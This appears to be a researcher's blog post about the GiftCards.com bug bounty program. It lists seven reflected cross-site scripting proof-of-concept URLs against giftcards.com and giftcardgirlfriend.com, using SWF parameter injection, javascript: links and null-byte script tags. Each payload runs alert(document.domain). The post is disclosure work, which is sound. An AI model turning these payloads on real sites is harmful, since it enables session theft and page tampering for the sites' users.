My experiences with the GiftCards.com Bug Bounty Program
Since November 2013 I reported seven Cross-site Scripting vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of them wasn’t a duplicate :-/. Strange? Perhaps, but not impossible given the simplicity of the vulnerabilities.
But, what I really don’t understand: Why do they still work until today?
11/17/2013 Vulnerability #1: (DUP)
// Reflected Cross-site Scripting
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}// |
// Original advisory
11/17/2013 Vulnerability #2: - OK – Reward or not ;-)
// Reflected Cross-site Scripting (tested with FF 25.0.1)
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);// |
// Original Advisory
11/21/2013 Vulnerability #3: (DUP)
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox 25.0.1)
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain); http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain); |
11/26/2013 Vulnerability #4: (DUP)
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script> |
12/05/2013 Vulnerability #5:
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script> |
12/05/2013 Vulnerability #6:
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script> |
12/05/2013 Vulnerability #7:
// Reflected Cross-site Scripting with IE10
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script> |
Comments
Display comments as Linear | Threaded